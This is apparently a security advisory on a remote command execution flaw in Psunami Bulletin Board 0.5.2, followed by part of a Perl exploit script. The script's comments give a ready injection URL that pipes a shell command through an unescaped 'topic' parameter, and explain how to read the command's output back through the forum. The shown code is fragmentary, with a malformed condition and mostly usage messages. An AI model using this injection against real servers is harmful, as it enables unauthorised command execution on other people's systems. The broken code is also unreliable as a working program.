Due to a vulnerability in Psunami Bulletin Board, a remote attacker can cause it to execute arbitrary commands as the user running the CGI code. This would allow a remote attacker to compromise the integrity of the remote system. The following exploit code can be used to determine whether you are vulnerable.
The information has been provided by dodo.
* Psunami Bulletin Board version 0.5.2
#Psunami Bulletin Board CGI remote command execution
#tested on version 0.5.2
#PsunamiBB doesn't look for escape characters in the GET variables
#When u view a thread u can escape your command:
#U can execute your command by:
#http://127.0.0.1/cgi-bin/psunami.cgi?action=board&board=1&topic=|ls -al /|
#The command will be executed, however it will not be shown...
#This is perlscript makes use of the forum and displays your command
# usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]
# example: /cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\\\v \\\\n
# //note: tr is used to convert the \n's to \v's and back, so it fits in the bbfiles
# u might have to adjust the wait times depending on connection and server
# when there is no results, u should try again, it's often a matter of multiple tries
# the server must also run tr, this is essential for this exploit to see the cmd output
if(!$ARGV || !$ARGV)
print "PsunamiBB remote execution CGI exploit\nby dodo [firstname.lastname@example.org]\n\n";
print "usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]\n";
print "example: ./cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\\\v \\\\n \n\n";
print "if it doesnt seemwork, try adjusting the sleep times or try multiple times\nyour command output should be somewhere in the html output\n";
print "the above is received from the server, if you have a 404 or 403, theres somethin wrong
if not, and no command output, try again..
if command ouput buggy, convert \\v to \\n with tr\n";